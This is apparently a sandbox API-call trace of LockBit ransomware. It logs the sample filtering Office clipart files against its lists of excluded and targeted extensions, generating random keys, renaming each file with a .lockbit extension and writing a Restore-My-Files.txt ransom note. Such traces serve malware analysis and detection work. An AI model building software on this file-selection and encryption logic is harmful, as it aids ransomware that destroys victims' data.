[0185.580] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.580] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.581] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.581] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.581] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.581] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.581] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.581] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.582] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="ntldr", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02201_.GIF") returned -1 [0185.582] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02201_.GIF") returned -1 [0185.582] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.582] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF") returned=".GIF" [0185.582] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.582] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.583] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.583] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.584] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.584] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.584] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.584] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.584] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.584] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.lockbit") returned 85 [0185.584] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02201_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0185.585] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.585] malloc (_Size=0x40068) returned 0x3f70048 [0185.586] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=5715) returned 1 [0185.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0185.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0185.587] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.592] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.592] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.592] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.600] free (_Block=0x1fa2ed8) [0185.600] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.600] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.600] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x136b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02214_.GIF", cAlternateFileName="")) returned 1 [0185.600] lstrcmpiW (lpString1=".", lpString2="WB02214_.GIF") returned -1 [0185.600] lstrcmpiW (lpString1="..", lpString2="WB02214_.GIF") returned -1 [0185.600] PathFindExtensionW (pszPath="WB02214_.GIF") returned=".GIF" [0185.600] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.600] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.600] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.600] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.600] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.600] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.601] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.601] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.601] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.601] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.601] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.601] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.602] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="ntldr", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02214_.GIF") returned -1 [0185.602] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02214_.GIF") returned -1 [0185.602] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.602] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF") returned=".GIF" [0185.602] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.602] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.602] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.602] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.603] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.603] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.603] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.lockbit") returned 85 [0185.604] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02214_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0185.605] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.605] malloc (_Size=0x40068) returned 0x1ff1e60 [0185.605] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4971) returned 1 [0185.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0185.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0185.606] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.755] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.755] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.757] free (_Block=0x1fa2ed8) [0185.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.757] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.757] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02218_.GIF", cAlternateFileName="")) returned 1 [0185.757] lstrcmpiW (lpString1=".", lpString2="WB02218_.GIF") returned -1 [0185.757] lstrcmpiW (lpString1="..", lpString2="WB02218_.GIF") returned -1 [0185.757] PathFindExtensionW (pszPath="WB02218_.GIF") returned=".GIF" [0185.757] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.757] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.757] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.757] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.757] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.757] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.757] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.757] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.758] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.758] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="ntldr", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02218_.GIF") returned -1 [0185.759] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02218_.GIF") returned -1 [0185.759] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.759] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF") returned=".GIF" [0185.759] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.759] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.759] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.760] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.760] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.760] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.lockbit") returned 85 